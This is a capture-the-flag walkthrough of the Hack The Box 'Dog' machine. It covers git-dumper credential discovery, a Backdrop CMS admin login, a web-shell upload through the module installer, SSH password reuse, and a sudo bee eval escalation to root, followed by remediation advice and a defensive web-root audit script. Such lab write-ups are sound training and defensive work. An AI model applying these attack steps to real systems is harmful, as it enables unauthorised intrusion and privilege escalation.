HackTheBox Dog Walkthrough - Pentest Lab Notes
Hack The Box | Dog - Walkthrough
This walkthrough details the steps taken to fully compromise the Dog machine on Hack The Box.
Status: Pwned
HTB Link: https://app.hackthebox.com/machines/651
Difficulty: Easy
Skills: Web Exploitation, Enumeration, Privilege Escalation
Enumeration & Initial Access
Network Scanning
Initial Nmap scan to discover open ports and services:
nmap -sV -sC -oN nmap/initial.nmap 10.10.11.58
Results:
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Port 22: OpenSSH
Port 80: Apache with a robots.txt revealing multiple sensitive paths.
Web Enumeration
Target website runs Backdrop CMS.
A .git directory was found and dumped using:
git-dumper http://10.10.11.58/.git ./git-dump/
After 8 hours of enumeration, found credentials in settings.php:
$database = 'mysql://root:BackDrop...@127.0.0.1/backdrop';
Discovered user email: tiffany@dog.htb
CMS Admin Panel Access
Tried credentials: tiffany:BackDropJ2024DS2024 → Success!
Logged into Backdrop CMS Admin Panel.
Exploiting Backdrop CMS
Backdrop CMS v1.21.0 has a known vulnerability (Exploit-DB #52021).
Created a malicious .tar file containing a PHP web shell.
Uploaded it via:
http://10.10.11.58/?q=admin/installer/manual
Accessed shell at:
http://10.10.11.58/modules/shell/shell.php
Gaining Shell Access
From the shell, enumerated users via /etc/passwd.
Found user: johncusack.
Tried SSH login:
ssh johncusack@10.10.11.58
Password: BackDrop…
User Shell Acquired!
id
uid=1001(johncusack) gid=1001(johncusack) groups=1001(johncusack)
User flag located at:
/home/johncusack/user.txt
Privilege Escalation
Sudo Permissions
Check with:
sudo -l
Result:
User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee
Abusing bee Utility
bee is a CLI tool for Backdrop CMS.
It supports an eval option, so running it through sudo executes arbitrary PHP as root.
Exploit:
sudo /usr/local/bin/bee ev "system('id')"
Output:
uid=0(root) gid=0(root) groups=0(root)
Root shell acquired!
Flags
user.txt: /home/johncusack/user.txt
root.txt: /root/root.txt
Remediation Recommendations
Restrict access to .git directories.
Remove sensitive backups or hidden directories.
Avoid hardcoding credentials.
Carefully review and limit sudo permissions.
Update vulnerable CMS software.
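A pre-deployment check for the first three recommendations, as an added example that is not part of the original walkthrough: it walks a web root, reports any version-control directory such as .git, and flags URL-style database strings with an embedded password like the settings.php line above, printing them with the password redacted. The function name audit_webroot and the file suffix list are assumptions made for this example.

```python
#!/usr/bin/env python3
"""Audit a web root for exposed VCS metadata and passwords embedded in DSNs."""
import os
import re
import sys

# scheme://user:password@host ; "/" is excluded from the password so that
# ordinary URLs with a port (http://host:8080/a@b) are not reported.
DSN_RE = re.compile(
    r"""\b([a-z][a-z0-9+.-]*)://([^:/@\s'"]+):([^@/\s'"]+)@([^/\s'"]+)""", re.I)
VCS_DIRS = {".git", ".svn", ".hg"}
# Assumed list of file types worth scanning; extend for your stack.
TEXT_SUFFIXES = (".php", ".inc", ".env", ".ini", ".yml", ".yaml", ".json")


def audit_webroot(root):
    """Return sorted (kind, relative_path, detail) findings under root."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in list(dirnames):
            if d in VCS_DIRS:
                rel = os.path.relpath(os.path.join(dirpath, d), root)
                findings.append(("vcs-dir", rel, "version-control metadata inside web root"))
                dirnames.remove(d)  # prune: do not scan repository internals
        for name in filenames:
            if not name.endswith(TEXT_SUFFIXES):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for lineno, line in enumerate(fh, 1):
                        m = DSN_RE.search(line)
                        if m:
                            scheme, user, _password, host = m.groups()
                            detail = f"line {lineno}: {scheme}://{user}:<redacted>@{host}"
                            findings.append(("dsn-password", rel, detail))
            except OSError as exc:
                findings.append(("unreadable", rel, str(exc)))
    return sorted(findings)


if __name__ == "__main__":
    results = audit_webroot(sys.argv[1] if len(sys.argv) > 1 else ".")
    for kind, rel, detail in results:
        print(f"[{kind}] {rel}: {detail}")
    # Non-zero exit lets a deploy pipeline fail on real findings.
    sys.exit(1 if any(kind != "unreadable" for kind, _, _ in results) else 0)
```

Run it against the document root before each deploy; a placeholder DSN left in a template file will also be reported and should be reviewed rather than ignored.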
Summary
Step                    Action
Initial Foothold        Backdrop CMS admin login via reused creds
Shell Access            Upload PHP shell through CMS module installer
Lateral Movement        SSH as johncusack with found creds
Privilege Escalation    Abused sudo bee to run PHP as root